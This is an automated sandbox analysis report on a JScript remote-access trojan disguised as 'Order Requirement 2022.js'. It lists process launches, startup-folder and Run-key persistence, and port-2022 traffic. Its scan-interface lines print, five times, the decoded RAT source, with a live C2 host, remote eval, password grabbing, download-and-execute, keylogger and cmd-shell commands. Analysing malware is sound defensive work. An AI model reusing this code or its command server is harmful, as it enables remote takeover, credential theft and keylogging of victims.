              Source: Yara matchFile source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR

              System Summary

              barindex
              Wscript called in batch mode (surpress errors)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Potential malicious VBS/JS script found (suspicious encoded strings)
              Source: Order Requirement 2022.jsInitial sample: Suspicious string keylogger A2V5BG9NZ2VY
              Source: Order Requirement 2022.jsInitial sample: Suspicious string spreading C3BYZWFKAW5N
              Source: Order Requirement 2022.jsInitial sample: Suspicious string .write LNDYAXRL
              Source: Order Requirement 2022.jsInitial sample: Suspicious string %comspec% JWNVBXNWZWML
              Source: Order Requirement 2022.jsInitial sample: Suspicious string win32_ D2LUMZJF
              Source: Order Requirement 2022.jsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Requirement 2022.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winJS@20/6@14/3
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts

              Data Obfuscation

              barindex
              JScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.

              Boot Survival

              barindex
              Drops script or batch files to the startup folder
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.jsJump to dropped file
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.jsJump to dropped file
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATAJump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATAJump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATAJump to behavior
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATA
              Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022Jump to behavior
              Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022Jump to behavior
              Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022Jump to behavior
              Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022Jump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 2022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 2022
